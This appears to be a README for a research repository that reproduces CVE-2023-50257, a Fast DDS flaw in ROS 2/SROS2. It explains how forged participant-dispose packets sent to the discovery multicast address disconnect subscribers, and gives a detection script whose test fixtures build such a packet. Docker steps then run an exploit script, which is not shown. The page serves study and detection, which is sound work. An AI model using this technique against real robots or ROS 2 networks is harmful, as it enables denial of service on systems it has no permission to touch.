
CVE-2023-50257 PoC — Disconnect Vulnerability in RTPS Packets Used by SROS2

Associated Vulnerability
Title: Disconnect Vulnerability in RTPS Packets Used by SROS2 (CVE-2023-50257)
Description: eProsima Fast DDS (formerly Fast RTPS) is a C++ implementation of the Data Distribution Service standard of the Object Management Group. Even with the application of SROS2, due to the issue where the data (`p[UD]`) and `guid` values used to disconnect between nodes are not encrypted, a vulnerability has been discovered where a malicious attacker can forcibly disconnect a Subscriber and can deny a Subscriber attempting to connect. Afterwards, if the attacker sends the packet for disconnecting, which is data (`p[UD]`), to the Global Data Space (`239.255.0.1:7400`) using the said Publisher ID, all the Subscribers (Listeners) connected to the Publisher (Talker) will not receive any data and their connection will be disconnected. Moreover, if this disconnection packet is sent continuously, the Subscribers (Listeners) trying to connect will not be able to do so. Since the initial commit of the `SecurityManager.cpp` code (`init`, `on_process_handshake`) on Nov 8, 2016, the Disconnect Vulnerability in RTPS Packets Used by SROS2 has been present prior to versions 2.13.0, 2.12.2, 2.11.3, 2.10.3, and 2.6.7.

What the advisory's shorthand refers to: `DATA(p[UD])` is Wireshark's label for a DATA submessage from the built-in participant discovery (SPDP) writer whose inline QoS carries the StatusInfo flags Unregistered and Disposed, i.e. the announcement a participant sends when it leaves the domain. The `guid` is the 16-octet participant GUID (12-octet prefix plus the participant entity id) that the same submessage carries as its key hash, and `239.255.0.1:7400` is the default SPDP multicast address and port for domain 0. SPDP traffic is sent in the clear even with DDS-Security/SROS2 enabled, so nothing binds a dispose announcement to the authenticated participant it names: an attacker who reads the talker's GUID prefix from its periodic announcements can dispose it on its behalf, and the other participants drop the talker's endpoints as if it had shut down.
Description
This repository is for research purposes (2025 Sejong Univ. Capstone Design)
Readme
# ROS2 CVE-2023-50257 Reproduction

## 🔍 Overview

This repository builds on the public PoC for CVE-2023-50257 and automates its three steps: capture RTPS discovery traffic on the network, parse the target participant's GUID out of it, and send the dispose packet that produces the denial of service.
**CVE-2023-50257** is a vulnerability in eProsima Fast DDS, the default DDS middleware of ROS 2 (Robot Operating System 2), so ROS 2 deployments running on Fast DDS, including those hardened with SROS2, are affected.
- [https://github.com/eProsima/Fast-DDS/security/advisories/GHSA-v5r6-8mvh-cp98](https://github.com/eProsima/Fast-DDS/security/advisories/GHSA-v5r6-8mvh-cp98)
- [https://github.com/Desglaneurs/BoB_Des_glaneurs/tree/main/CVE-2023-50257](https://github.com/Desglaneurs/BoB_Des_glaneurs/tree/main/CVE-2023-50257)
> ⚠️ **This project is strictly for educational and research purposes. Do not use it in production or against systems you do not own or have permission to test.**
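The packet pattern described above, seen from the defender's side, as an added example that is not the repository's `ex.py` and not Fast DDS code: a standard-library Python parser that walks RTPS datagrams (the UDP payload on port 7400, e.g. `bytes(pkt[UDP].payload)` from a scapy capture), flags the `DATA(p[UD])` participant-dispose announcements the CVE abuses, and counts repeated disposes per GUID prefix for the "sent continuously" case. Field layouts follow the public DDSI-RTPS specification; the `build_sample_*` helpers, the vendorId, the timestamp and the sample GUID prefix are constructed here solely to produce offline test input and are not captures from the page.

```python
"""Flag the DATA(p[UD]) participant-dispose announcements that CVE-2023-50257 abuses.
Added example for this page (not the repository's ex.py, not Fast DDS code); it sends
nothing. Layout follows the public DDSI-RTPS spec; sample datagrams are constructed."""
import struct
from collections import Counter

RTPS_MAGIC = b"RTPS"
SUBMSG_INFO_TS, SUBMSG_DATA = 0x09, 0x15
FLAG_ENDIAN, FLAG_INLINE_QOS, FLAG_DATA_PAYLOAD = 0x01, 0x02, 0x04   # E, Q, D bits
ENTITYID_PARTICIPANT, ENTITYID_SPDP_WRITER, ENTITYID_SPDP_READER = 0x000001C1, 0x000100C2, 0x000100C7
PID_SENTINEL, PID_KEY_HASH, PID_STATUS_INFO = 0x0001, 0x0070, 0x0071
STATUS_DISPOSED, STATUS_UNREGISTERED = 0x01, 0x02

def _parse_parameter_list(buf, off, endian):
    """Read parameterId/length/value triples (inline QoS) up to PID_SENTINEL."""
    params = {}
    while off + 4 <= len(buf):
        pid, plen = struct.unpack_from(endian + "HH", buf, off)
        off += 4
        if pid == PID_SENTINEL:
            break
        params[pid] = buf[off:off + plen]
        off += plen                           # lengths are already 4-octet aligned
    return params

def parse_rtps(datagram):
    """Return one dict per DATA submessage: writer id, key hash and status flags."""
    if len(datagram) < 20 or datagram[:4] != RTPS_MAGIC:
        raise ValueError("not an RTPS datagram")
    header_prefix = datagram[8:20].hex()      # guidPrefix of the claimed sender
    entries, off = [], 20
    while off + 4 <= len(datagram):
        sub_id, flags = datagram[off], datagram[off + 1]
        endian = "<" if flags & FLAG_ENDIAN else ">"
        (to_next,) = struct.unpack_from(endian + "H", datagram, off + 2)
        start = off + 4                       # octetsToNextHeader 0 = runs to the end
        end = len(datagram) if to_next == 0 else min(start + to_next, len(datagram))
        if sub_id == SUBMSG_DATA and end - start >= 20:
            # extraFlags(2) octetsToInlineQos(2) readerId(4) writerId(4) writerSN(8) [QoS] [payload]
            (writer_id,) = struct.unpack_from(">I", datagram, start + 8)   # EntityId_t: 4 octets, endian-free
            params = {}
            if flags & FLAG_INLINE_QOS:
                (to_qos,) = struct.unpack_from(endian + "H", datagram, start + 2)
                params = _parse_parameter_list(datagram, start + 4 + to_qos, endian)
            raw = params.get(PID_STATUS_INFO, b"")
            status = raw[3] if len(raw) >= 4 else 0   # StatusInfo_t keeps its flags in the last octet
            entries.append({"header_prefix": header_prefix, "writer_id": writer_id,
                            "key_hash": params.get(PID_KEY_HASH, b"").hex(),
                            "disposed": bool(status & STATUS_DISPOSED),
                            "unregistered": bool(status & STATUS_UNREGISTERED)})
        off = end
    return entries

def is_participant_dispose(entry):
    """DATA(p[UD]) / DATA(p[D]): the SPDP writer announcing a participant as gone."""
    return entry["writer_id"] == ENTITYID_SPDP_WRITER and entry["disposed"]

def find_dispose_floods(datagrams, threshold=3):
    """Count dispose announcements per target guidPrefix (hex, from the key hash) and
    return those hit at least `threshold` times: the advisory's 'sent continuously' case."""
    counts = Counter()
    for dg in datagrams:
        for e in parse_rtps(dg):
            if is_participant_dispose(e):
                counts[e["key_hash"][:24] or e["header_prefix"]] += 1
    return {prefix: n for prefix, n in counts.items() if n >= threshold}

# --- constructed fixtures for offline testing (not captures from the page) ---
def _rtps_header(prefix):
    return RTPS_MAGIC + b"\x02\x02" + b"\x01\x0f" + prefix   # version 2.2, arbitrary vendorId

def _data_submsg(flags, body):
    return bytes([SUBMSG_DATA, flags]) + struct.pack("<H", len(body)) + body

def _data_body(seq, tail):
    return (struct.pack("<HH", 0, 16) + struct.pack(">II", ENTITYID_SPDP_READER, ENTITYID_SPDP_WRITER)
            + struct.pack("<iI", 0, seq) + tail)             # extraFlags, octetsToInlineQos, ids, SN

def build_sample_dispose(prefix):
    """INFO_TS + DATA(p[UD]) disposing the participant whose guidPrefix is `prefix`."""
    info_ts = bytes([SUBMSG_INFO_TS, FLAG_ENDIAN]) + struct.pack("<HII", 8, 0x5F000000, 0)
    qos = (struct.pack("<HH", PID_STATUS_INFO, 4) + bytes([0, 0, 0, STATUS_DISPOSED | STATUS_UNREGISTERED])
           + struct.pack("<HH", PID_KEY_HASH, 16) + prefix + struct.pack(">I", ENTITYID_PARTICIPANT)
           + struct.pack("<HH", PID_SENTINEL, 0))
    return _rtps_header(prefix) + info_ts + _data_submsg(FLAG_ENDIAN | FLAG_INLINE_QOS, _data_body(2, qos))

def build_sample_announce(prefix):
    """An ordinary SPDP announcement: DATA(p) with a (stub PL_CDR_LE) payload and no inline QoS."""
    payload = b"\x00\x03\x00\x00" + struct.pack("<HH", PID_SENTINEL, 0)
    return _rtps_header(prefix) + _data_submsg(FLAG_ENDIAN | FLAG_DATA_PAYLOAD, _data_body(1, payload))

if __name__ == "__main__":
    victim = bytes(range(1, 13))                              # constructed guidPrefix
    traffic = [build_sample_announce(victim)] + [build_sample_dispose(victim)] * 3
    print(find_dispose_floods(traffic))                       # {'0102030405060708090a0b0c': 3}
```

A legitimate participant sends exactly one such dispose when it shuts down, so a single hit is not an alert; the signal is a dispose for a prefix that keeps appearing in fresh SPDP announcements, or repeated disposes for the same prefix, which is what `find_dispose_floods` counts. Fast DDS releases at or above the fixed versions named in the advisory are not affected; the 2.6.3 used in the environment below is.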


## 🧪 Environment

- OS: Ubuntu 22.04
- ROS 2 version: ROS 2 Humble / Fast DDS 2.6.3 / rmw_fastrtps 6.2.3
- Note: Fast DDS 2.6.3 predates 2.6.7, the first fixed release on the 2.6 line (see the advisory text above), so this environment is affected; against a fixed release the reproduction is not expected to work.

## 🚀 Getting Started

1. Clone the repository, build the Docker image that provides the environment, and create the user-defined bridge network on which the two ROS 2 containers will discover each other (`docker build .` must run inside the cloned directory):
```bash
git clone https://github.com/Jminis/CVE-2023-50257.git
cd CVE-2023-50257
docker build -t cve_2023_50257 .
docker network create ros2_net
```
2. In Terminal 1 (listener), start a container and run the listener node:
```bash
docker run -it --net ros2_net --name listener cve_2023_50257
ros2 run demo_nodes_cpp listener
```

3. In Terminal 2 (talker), start a second container and run the talker node; once discovery completes, the listener should start printing `I heard: ...` lines:
```bash
docker run -it --net ros2_net --name talker cve_2023_50257
ros2 run demo_nodes_cpp talker
```

4. In Terminal 3 (host), run `ex.py` from the cloned repository. Scapy needs raw-socket privileges to sniff the talker's discovery announcements (from which it recovers the GUID) and to send the dispose packet to `239.255.0.1:7400`, hence `sudo`; `-E` keeps your environment so the user-installed scapy is found:
```bash
pip install scapy
sudo -E python3 ex.py
```
Once the dispose packet is delivered, the listener stops receiving the talker's data; if the packet is sent repeatedly, listeners that try to (re)connect are denied as well, as described in the advisory text above.

## 📺 Demo
![DEMO](https://github.com/Jminis/CVE-2023-50257/blob/main/DEMO/TEST.gif)